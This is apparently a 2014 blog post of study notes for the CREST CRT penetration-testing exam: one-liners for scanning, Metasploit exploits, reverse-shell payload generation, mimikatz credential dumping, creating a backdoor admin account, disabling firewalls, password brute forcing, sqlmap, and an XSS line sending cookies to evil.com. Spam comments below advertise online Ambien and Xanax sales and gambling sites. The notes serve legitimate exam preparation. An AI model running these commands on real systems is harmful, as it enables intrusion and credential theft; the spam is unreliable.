Wednesday, 31 December 2014

CREST CRT Exam Preparation

I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.

Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)

What have we gota do? 

First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html

To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."

For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.


Getting hands-on!

My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with Kali Linux VM. Below is my full list of tools and one-liners:

RECON AND ENUMERATION

CommandDescription
nmap -T4 -A -Pn -oA scan -v 192.168.1.1-254Full scan
for i in 21 22 23 80 443 445;do cat scan.gnmap|grep " $i/open"|cut -d " " -f2 > $i.txt;doneParse results into txt files per port
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=pwndizzle,smbpass=mypassword -p445 192.168.1.1-254Check for open shares
dig axfr example.com @ns1.example.comDNS zone transfer (Linux)
tcp.port, tcp.srcport, ip.src, ip.dst, or, andWireshark syntax
tcpdump tcp port 80 -w output.pcap -i eth0Tcpdump syntax
mount 192.168.1.1:/share /mnt/nfsMount an NFS share
mount -o nolock -t nfs -o proto=tcp,port=2049 172.16.1.1:/ /mntMount an NFS share
mount -t cifs -o username=<user>,password=<password>,domain=example.com //WIN_PC_IP/<share name> /mnt/windowsMount a Windows share
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:noMount a Windows share
net use \\<target>\IPC$ "" /u:""Null session
rpcclient -U "" <target>Null session
enum4linux.pl 192.168.1.20Retrieve domain info
onesixtyone -c names -i snmphostsSNMP enum
snmpcheck -t 172.10.1.1 -c publicSNMP enum
nslookup -> set type=any -> ls -d <domain>DNS zone transfer (Windows)
nmap --script=smb-check-vulns --script-args=unsafe=1 -p445 <host>SMB vuln scan



METASPLOIT

CommandDescription
use auxiliary/scanner/http/dir_scannerScan for directories
use auxiliary/scanner/http/jboss_vulnscanJBoss scan
use exploit/multi/http/jboss_maindeployerJBoss deploy
use auxiliary/scanner/mssql/mssql_loginMSSQL cred scan
use exploit/windows/mssql/mssql_payloadMSSQL payload
use auxiliary/scanner/mysql/mysql_versionMySQL version scan
use auxiliary/scanner/mysql/mysql_loginMySQL login
use auxiliary/scanner/oracle/oracle_loginOracle login
use exploit/windows/dcerpc/ms03_026_dcomeazymode
use exploit/windows/smb/ms06_040_netapieazymode
use exploit/windows/smb/ms08_067_netapieazymode
use exploit/windows/smb/ms09_050_smb2_negotiate_func_indexeazymode
run post/windows/gather/win_privsShow privs of current user
use exploit/windows/local/bypassuac (check if x86/64 and set target)Bypass uac on win7+
load mimikatz -> wdigestDump creds
load incongnito -> list_tokens -> impersonate_tokenUse tokens
use post/windows/gather/credentials/gppGPP
run post/windows/gather/local_admin_search_enumTest other machines
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exeStandalone meterpreter
use exploit/multi/script/web_deliveryPowershell payload delivery
post/windows/manage/powershell/exec_powershellUpload and run a PS script through a session
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.1.3.19 LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exeGenerate standalone payload



WINDOWS COMMANDS

https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit

ipconfig /all
Displays the full information about your NIC’s.
ipconfig /displaydns
Displays your local DNS cache.
netstat -nabo
Lists ports / connections with corresponding process (-b), don’t perform looking (-n), all connections (-a) and owning process ID (-o)
netstat -r
Displays the routing table

netstat -anob | findstr “services, process or port”
The “b” flag makes the command take longer but will output the process name using each of the connections.
netsh diag show all
{XP only} Shows information on network services and adapters
net view
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.
net view /domain
List all domains available to the host
net view /domain:otherdomain
Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’
net user %USERNAME% /domain
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain
Lists all of the domain users
net accounts
Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain
Prints the password policy for the domain
net localgroup administrators
Prints the members of the Administrators local group
net localgroup administrators /domain
as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
net group “Domain Admins” /domain
Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
Prints the list of Domain Controllers for the current domain
net share
Displays your currently shared SMB entries, and what path(s) they point to
net session | find / “\\”

arp -a
Lists all the systems currently in the machine’s ARP table.
route print
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
whoami
View the current user
tasklist /v
List processes
taskkill /F /IM "cmd.exe"
Kill a process by its name
net user hacker hacker /add
Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
Disables the local windows firewall

wmic useraccount get name,sid     -  Retrieve name and sid from command line.


LINUX COMMANDS

CommandDescription
apt-get install finger rsh-client jxplorer sipcalcFinger not installed in Kali by default
apt-get install rsh-clientR-tools not installed in Kali by default
uname -aKernel version
cat /etc/<distro>-releaseRelease version
showrev -pRevision
rlogin -l <user> <target>rlogin
rsh <target> <command>rsh
find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt &Find setuid binaries
finger <username>@<ip>Retrieve user info
mysql -h <ip> -u <user> -p <password>Connect to mysql
oscanner -s <ip> -r <repfile>Oracle scanner


PASSWORD GUESSING

CommandDescription
hydra -L users -P passwords -M 21.txt ftpBrute ftp
hydra -L users -P passwords -M 22.txt sshBrute ssh
hydra -L users -P passwords -M 445.txt smbBrute smb

User List
root
admin
administrator
manager
crest
crt
user


PASSWORD CRACKING

CommandDescription
john --wordlist=/usr/share/wordlists/rockyou.txt hashesJTR default


WEB APP

CommandDescription
document.write('<img src="http://evil.com/x.gif?cookie=' + document.cookie + '" />)XSS steal cookie
sqlmap -u <target> -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/test.php"Targeted scan
sqlmap -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3Automated scan

65 comments:

  1. Replies
    1. Great Article Cyber Security Projects projects for cse Networking Security Projects JavaScript Training in Chennai JavaScript Training in Chennai The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

      Delete
  2. Congratulations! I take it next week you see. Any pointers?

    ReplyDelete
  3. It's still early days for me, however I have done lots of training over the years (10+), SCP, Security+, Backtrack 101, CISSP, CEH, ECSA. Now, I know many of the courses I have done are only touching the tip of the iceberg in relation to Pen-Testing but as I am out of work I was wondering if it would be reasonable to skip the training and just take the exam?

    ReplyDelete
  4. Like any exam it's wise to revise and prepare accordingly. The amount of prep depends on your experience. For the CRT if you have a few years security/pentesting experience you should be fine. Without practical experience though you may find it hard.

    ReplyDelete
  5. Does this exam follow CTF fashion ? Where you have to own different boxes? Apart from that, which is the level of detail requested in the exam? Do you have to know every single thing from IPSec for instance?

    ReplyDelete
  6. Hi there,

    Have you taken the CPSA exam. Can you share some tips if there is any technical aspect of the test?

    ReplyDelete
  7. can i connect with you to ask for more info? u email pls?

    ReplyDelete
  8. Great post and informative blog.it was awesome to read, thanks for sharing this great content to my vision.
    Good discussion.
    PMP Training Course in Bangalore
    PMP Training Course in Dammam
    PMP Training Course in Dubai
    PMP Training Course in Jeddah
    PMP Training Course in Riyadh

    ReplyDelete
  9. Great Article… I love to read your articles because your writing style is too good, its is very very helpful for all of us. Do check Six Sigma Training in Bangalore | Six Sigma Training in Dubai & Get trained by an expert who will enrich you with the latest trends.

    ReplyDelete
  10. Hi, great post! One more question?
    Do I need to get root to the exam boxes to find all the answers or is just enough to make scans and enumerate the machine to find its?
    Please advise.
    I looking to book the exam ASAP.
    Thanks

    ReplyDelete
  11. I know that after reading this useful info you will learn a lot about avoiding plagiarism. I had such experience recently

    ReplyDelete
  12. Your post is very helpful and information is reliable. I am satisfied with your post. Thank you so much for sharing this wonderful post. Visit:- advisor for you office.com/setup | office.com/setup | | Norton.com/setup | office.com/setup | log in Telstra Webmail Account

    ReplyDelete
  13. To reach American Express phone number or AMEX Phone Number, follow our article and get a list of american express customer care numbers or amex phone number.

    https://xperria.com/banks/american-express-phone-number/

    ReplyDelete
  14. An overview of ProtonMail sign up and login process In the world of Gmail and Yahoo, there is one email service provider that is overpowering these prominent emailing platform i.e. ProtonMail. This emailing platform runs on Swiss Privacy Standard to secure users data from getting into wrong hands. So, those users who are curious to know what is ProtonMail and ProtonMail login process can continue reading this informative further.
    visit@-
    mcafee.com/activate |
    office.com/setup |

    ReplyDelete
  15. Chase Verify Card – Chase bank Credit Card clients can confirm and activate online at chase.com. In the event that you have just applied for a Credit Card of Chase Bank, you ought to activate it by confirming it online at Bank's authentic site is www.chase.com. On the off chance that you "How would I enact my interest Credit Card?" Are searching for. So read the cycle beneath to confirm the card, at that point activate it.
    Read More…

    ReplyDelete

  16. I found this is an informative blog and also very useful and knowledgeable. I would like to thank you for the efforts you have made in writing this blog Buy Ambien Online

    Order Ambien Online

    Buy Ambien 10mg Online


    ReplyDelete
  17. I found this is an informative blog and also very useful and knowledgeable. I would like to thank you for the efforts you
    have made in writing this blog

    Xanax Bars For Sale Online


    buy Xanax online

    ReplyDelete
  18. The way toward enacting Amazon Prime Video on Roku is exceptionally simple yet for this, you need to initially make a record on Amazon Prime to get the enlistment code and afterward on www.amazon.com/mytv go and afterward enter the Activation code.
    Read more…

    ReplyDelete
  19. Welcome to you all, you are probably searching for your other half if you have found this review. find a russian bride You're very fortunate if you came here for your love just as I did once. I was also alone for a long time now, and francly I didn't think I would ever search for a soul mate, but I changed my mind dramatically when I saw this awesome dating site because you really do find love on this site! Can you believe that you don't have to wander through the parks to find girls? Now all this can be done on this website online. And you have to log what you have to do is.

    ReplyDelete
  20. I concluded one day that it was time for me to sit down and locate a second half. But it was hard for me, because it is not simple for me to communicate with people in real life. Lately, the Internet was not simpler, and more sociable was the Internet, and I did not. I always desired a wife for myself at the same time, however. How good a latin wives can now be. You discuss a bit before that and grasp whether you are suited for yourself

    ReplyDelete
  21. Accurate info soft Provide The https://acsonnet.com/it-outsourcing/robotic-process-automation-rpa/. And this is a tool that makes it easy to develop, manage and deploy software robots that emulate people actions communicating with digital systems and also with software tools.

    ReplyDelete
  22. Accurate Infosoft Provide Application maintenance services in USA, This software is changing business environment and technology enhancement it is very necessary for organization to maintain and update existing applications. Our Application maintenance services will help organizations to provide high service levels and reduce expenses.

    ReplyDelete
  23. Accurate infosoft Provide Best Erp solution in USA. It is based on ISO guidelines therefore it automates business process in a more systematic way and help enterprise to achieve various level of standards in quality.

    ReplyDelete
  24. But what type of sales professional would suit? No one ever achieved true wealth working for another. Control of one's sales destiny lies with management decisions than can keep an entrepreneurial mind in short trousers. salesforce certification course

    ReplyDelete
  25. Several factors matter when you choose the Microsoft 365 subscription. Depending on your requirements on the respective productivity platforms, these products are different in price. MS 365 is a cloud-based subscription productivity suite best suitable for individuals, businesses, and homes as users don’t have to worry about updates or any custom-related features
    microsoft365.com/setup
    Microsoft365.com/setup

    ReplyDelete

  26. These printers are best to use in industries due to precise print, speed, and economical features. Instead of ink, these models use toner powder to print. Though, LaserJet printers are costly than inkjet printers for home users but affordable and best for businesses, industries, and large organizations.
    123.hp.com/laserjet,
    https //ij.start.cannon,
    http //ij.start.canon

    ReplyDelete
  27. Hi....
    The CREST Registered Tester (CRT) exam is an open book exam divided into two parts: A practical examination testing skills and knowledge needed to carry out effective security assessments. Multiple choice answers examining your technical knowledge.
    You are also read more 100 Home Loan

    ReplyDelete
  28. Investing Secne Is An Online Portal To Find, Compare And Review The Best Brokers And Trading Strategies Around The Globe. Along With Broker Reviews & Login Details At Investing Secne, You Can Also Find News, Latest Articles, Prs, Industry Updates And Tools That May Be Useful In Making Investment Decisions.

    ReplyDelete
  29. We are a service provider with expertise in providing complete information on Harris Teeter Ess . Our team has the resources you need to trade intelligently and improve your knowledge base. Check out our special reports page to get key information on this stock as well as other stocks that may be of interest to you.

    ReplyDelete
  30. Read Newspaper Online list sorted by Countries and by languages. A huge collection of newspaper or epapers online from all over the world in various languages. Epaper hub contains Print edition epaper that you read Online and grab your news through internet. Here you can find any number of epaper in different language, from different cities, different countries and cities. So don’t wait and search you daily newspaper and enjoy news from all over the world online.

    ReplyDelete
  31. Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites

    artificial intelligence internship | best final year projects for cse | internship certificate online | internship for mba finance students | internship meaning in tamil

    ReplyDelete
  32. I appreciate your website. Its really very help full. Thanks for sharing the great information.
    Best Hospital Management Software in India
    Best Hospital Software in India

    ReplyDelete
  33. Welldone keep it up and thanks for sharing. What should be the immediate step to Change Yahoo Password is the most important aspect. If you are a Yahoo email user and want to have the solution factors, then do not worry anymore, you can simply talk to the Yahoo support team to ask the relevant strategies and resolve the issues. Different kinds of systems are there that have to be followed while changing the passwords effectively.  

    ReplyDelete
  34. It’s good to have a website like this. I can read all the opinions of others as well as i gained information to each and everyone here on your site. Just keep on going dude.
    Check over here:
    메이저사이트
    온라인경마
    경마사이트

    ReplyDelete
  35. Your post got my attention and shows me different perception for how we should boost our site. This is a really perfect for a new blogger like me who doesn’t want their site to be messy with those spammers who don’t even read your post but they have the guts to comment in your site. Thanks again.
    majortotositecom
    racesitepro
    oncasinositenet
    totopickpro

    ReplyDelete
  36. Having read this I believed it was really enlightening. I appreciate you spending some time and energy to put this content together. 토토

    ReplyDelete
  37. Hello! I just want to give you a big thumbs up for your excellent info you have got here on this post. 온라인경마

    ReplyDelete
  38. I like reading a post that can make people think. Also, thank you for allowing for me to comment! 파친코사이트

    ReplyDelete
  39. This is frequently an awesome post. this educational article give genuinely best quality information. 토토

    ReplyDelete
  40. I like the valuable information you provided in your article. I am sure I will learn many new things here! Good luck.

    Also Visit us
    Dry cleaners in Birmingham
    Laundry and dry cleaning services in Solihull

    ReplyDelete
  41. I appreciate your website. Its really very help full. Thanks for sharing the great information.

    Visit us for more..
    Spa and salon laundry services in Birmingham
    Commercial laundry services in Birmingham

    ReplyDelete
  42. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.
    eniac full form in computer
    dvd full form
    sit full form
    pcc full form
    iucn full form
    full form of lcd
    brics full form
    tally erp full form
    full form of ctbt
    crpf full form

    ReplyDelete
  43. The vacation trades offered are evaluated a variety of in the chosen and simply good value all around the world. Those hostels are normally based towards households which you’ll find accented via charming shores promoting crystal-clear fishing holes, concurrent of one’s Ocean. Hotels Discounts 메이저사이트

    ReplyDelete
  44. Great article. Keep writing such kind of information on your blog.

    Best call center software | Call center software

    ReplyDelete
  45. Visiting blogs like yours is important for every person. New information allows development. I have a question. can someone write my marketing plan, I think yes. I know I can order everything I need. Many writers are ready to write anything for me. It is very convenient for everyone.

    ReplyDelete
  46. Blogging is hard. You should always write interesting texts. If you need help I can help https://alanthomsonsim.com/Forums/users/lisakelt/. It is not difficult for me. I am a writer.

    ReplyDelete